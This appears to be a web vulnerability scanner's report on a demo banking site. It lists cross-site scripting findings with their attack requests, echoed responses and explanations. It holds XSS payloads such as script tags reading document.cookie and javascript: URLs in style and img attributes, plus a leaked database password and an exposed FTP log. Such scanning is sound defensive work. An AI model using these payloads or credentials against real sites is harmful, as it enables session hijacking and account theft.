Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:37 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE="test@<script>alert(document.cookie)</script>.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=<attack>test@<script>alert(document.cookie)</script>.com</attack>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
test@<script>alert\(document\.cookie\)POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=test@<script>alert(document.cookie)</script>.comHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:49 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 124
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data test@<script>alert(document.cookie)</script>.com<br>Please try again.
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "<script>alert(document.cookie)</script>" . If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 143
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=<attack>test@<script>alert(document.cookie)</script>.com</attack>test@<script>alert\(document\.cookie\)GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=1"style="background:url(javascript:alert('XSS'))"%20"&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:26 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=>"'><img%20src="javascript:alert('XSS')">HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:57:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 416
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = >"'><img src="javascript:alert('XSS')"></P><br>
<P>The <b>hidden</b> parameter "txtHidden" = >"'><img src="javascript:alert('XSS')"></P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp.bak
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>javascript:alert\('XSS'\)">GET /WS_FTP.LOG HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:34:11 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Fri, 19 Oct 2001 03:56:38 GMT
ETag: "b4a382d5258c11:8f6"
Content-Length: 480230
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
